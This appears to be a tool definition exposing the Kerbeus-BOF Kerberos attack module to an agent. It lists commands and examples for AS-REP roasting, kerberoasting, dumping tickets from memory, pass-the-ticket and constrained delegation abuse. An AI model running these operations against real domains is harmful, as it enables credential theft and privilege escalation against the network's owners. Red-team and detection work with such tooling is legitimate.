bof_kerbeus
Perform Kerberos ticket operations including AS-REP roasting, kerberoasting, ticket requests, dumping, and pass-the-ticket attacks.
Instructions
Kerbeus-BOF: Kerberos ticket operations and attacks.
kerbeus asreproasting /user: [/domain:] [/dc:] [/outfile:] AS-REP roasting. Example: kerbeus asreproasting /user:pre_user
kerbeus asktgt /user: /password: [/enctype:aes256] [/ptt] [/opsec] Request a TGT. Example: kerbeus asktgt /user:Admin /password:QWErty /enctype:aes256 /ptt
kerbeus asktgs /user: /service: [/ticket:<.kirbi>] [/enctype:aes256] [/ptt] Request a TGS. Example: kerbeus asktgs /user:Admin /service:cifs/dc01.corp.local
kerbeus changepw /ticket: /new: [/dc:] Reset a user password from a valid TGT.
kerbeus dump [/luid:] [/service:] [/client:] Dump Kerberos tickets from memory.
kerbeus hash /password: [/user:] [/domain:] [/enctype:rc4|aes128|aes256] Calculate Kerberos hashes.
kerbeus kerberoasting [/spn:] [/dc:] [/outfile:] Kerberoasting. Example: kerbeus kerberoasting
kerbeus klist [/luid:] List Kerberos tickets in memory.
kerbeus ptt /ticket: Submit (Pass-the-Ticket) a TGT. Example: kerbeus ptt /ticket:doIFg...
kerbeus describe /ticket: Parse and describe a ticket.
kerbeus purge [/luid:] Purge Kerberos tickets from memory.
kerbeus renew /ticket: [/dc:] [/ptt] Renew a TGT.
kerbeus s4u /user: /rc4: /impersonateuser: /msdsspn: [/ptt] S4U2Self/S4U2Proxy constrained delegation abuse.
kerbeus cross_s4u /user: /ticket: /impersonateuser: /msdsspn: [/ptt] Cross-domain S4U constrained delegation abuse.
kerbeus tgtdeleg /spn: Retrieve usable TGT without elevation via GSS-API. Example: kerbeus tgtdeleg /spn:host/dc01.corp.local
kerbeus triage [/luid:] List tickets in table format.
Input Schema
| Name | Required | Description | Default |
|---|---|---|---|
| agent_id | Yes | ||
| command | Yes | ||
| args | No |
Output Schema
| Name | Required | Description | Default |
|---|---|---|---|
| result | Yes |